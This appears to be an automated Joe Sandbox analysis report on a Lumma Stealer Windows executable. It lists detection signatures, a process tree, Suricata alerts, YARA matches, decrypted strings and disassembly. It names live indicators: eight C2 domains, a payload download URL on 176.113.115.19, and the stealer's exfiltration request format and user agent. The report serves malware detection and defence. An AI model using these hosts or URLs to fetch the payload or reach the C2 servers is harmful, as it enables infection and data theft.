Edit tour

Windows Analysis Report
TN78WX7nJU.exe

Overview

General Information

Sample name:	TN78WX7nJU.exe renamed because original name is a hash value
Original sample name:	e1c246e51c4460e34a3429a6fc397942.exe
Analysis ID:	1575131
MD5:	e1c246e51c4460e34a3429a6fc397942
SHA1:	48ee7173d3a33be1b81ce82c351b1b35bfcd4aac
SHA256:	5b6c7709634f9b0f38fcac6fb91bf82eefda4096935f0a539623df2ec981f5b5
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

TN78WX7nJU.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\TN78WX7nJU.exe" MD5: E1C246E51C4460E34A3429A6FC397942)

C455.tmp.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\C455.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)

WerFault.exe (PID: 7756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1058:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1338:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
1.3.C455.tmp.exe.a40000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.C455.tmp.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.C455.tmp.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.3.C455.tmp.exe.a40000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:54.029381+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-14T14:12:57.535218+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-14T14:13:01.486388+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	23.55.153.106	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:56.157822+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-14T14:12:59.016757+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:56.157822+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-14T14:12:59.016757+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49733	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:57.535218+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:54.029381+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.22.222	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:59.656713+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	56148	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:56.173425+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.4	60088	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:59.324973+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	51481	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:59.179780+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	64277	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:59.018983+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	63184	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:52.661007+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.4	52948	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:52.521399+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	52644	1.1.1.1	53	UDP
2024-12-14T14:12:59.797862+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	65393	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:59.503865+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	63953	1.1.1.1	53	UDP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:12:46.131119+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-14T14:12:47.868178+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	176.113.115.19	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T14:13:02.327356+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: TN78WX7nJU.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://diffuculttan.xyz/api	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/	Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/?	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/C	Avira URL Cloud: Label: malware
Source: https://awake-weaves.cyou/apiH	Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/x	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/#	Avira URL Cloud: Label: malware
Source: https://sordid-snaked.cyou/api~	Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/4	Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1312567

Found malware configuration

Source: 1.3.C455.tmp.exe.a40000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: TN78WX7nJU.exe	Virustotal: Detection: 40%			Perma Link
Source: TN78WX7nJU.exe	ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TN78WX7nJU.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: awake-weaves.cyou
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: debonairnukk.xyz
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: diffuculttan.xyz
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: effecterectz.xyz
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: deafeninggeh.biz
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Unpacked PE file: 0.2.TN78WX7nJU.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Unpacked PE file: 1.2.C455.tmp.exe.400000.0.unpack

Source: TN78WX7nJU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	1_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, edx	1_2_0040BDC9
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp al, 2Eh	1_2_00426054
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp eax	1_2_00426054
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	1_2_0040E83B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edx, ecx	1_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	1_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp ecx	1_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_00425990
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ecx, di	1_2_00425990
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0043B195
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	1_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	1_2_004369A0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	1_2_0041E9B0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_004299B0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	1_2_0042526A
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ebx, edi	1_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov esi, eax	1_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	1_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	1_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp ecx	1_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	1_2_00415298
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00415298
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0043AAB2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	1_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	1_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov eax, ebx	1_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	1_2_0043CB20
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edx, eax	1_2_00427326
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edi, dword ptr [esp+34h]	1_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_0042A3D0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042C45C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	1_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	1_2_00418578
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edx, eax	1_2_0042750D
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	1_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	1_2_00417582
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	1_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	1_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042AE48
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp eax	1_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042AE24
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00433630
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	1_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	1_2_0043CE90
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_004166A0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0042ADF4
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov eax, edx	1_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp eax	1_2_0043BF40
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	1_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	1_2_0043A777
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	1_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	1_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A1B0AF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00A1B08B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then jmp eax	1_2_00A170E4
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	1_2_00A2D0F7
